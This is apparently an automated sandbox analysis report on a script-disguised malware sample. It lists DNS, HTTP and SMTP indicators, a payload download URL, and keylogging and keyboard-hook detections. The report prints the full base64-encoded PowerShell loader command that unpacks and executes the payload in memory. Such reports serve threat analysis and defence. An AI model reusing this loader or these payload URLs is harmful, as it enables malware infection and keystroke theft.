Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.8:49709 -> 173.254.28.210:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AW/DH/Dvkuvug.dat HTTP/1.1Host: etehadshipping.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: etehadshipping.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.topcats.com

Source: InstallUtil.exe, 00000012.00000002.1895434529.0000000006246000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsnq
Source: InstallUtil.exe, 00000007.00000002.1790656213.0000000003171000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1790656213.0000000003171000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1787442278.000000000133A000.00000004.00000020.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting2
Source: InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingxLl
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.topcats.com
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1790656213.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: InstallUtil.exe, 00000012.00000002.1895434529.0000000006246000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004A37000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.000000000544E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://etehadshipping.com
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005542000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.00000000048B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://etehadshipping.com/AW/DH/Dvkuvug.dat
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.144.130.41:443 -> 192.168.2.8:49714 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 4.2.DOCUMENTS.vbs.exe.5cbb8b0.4.raw.unpack, POq2Ux.cs

.Net Code: pfingF

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBv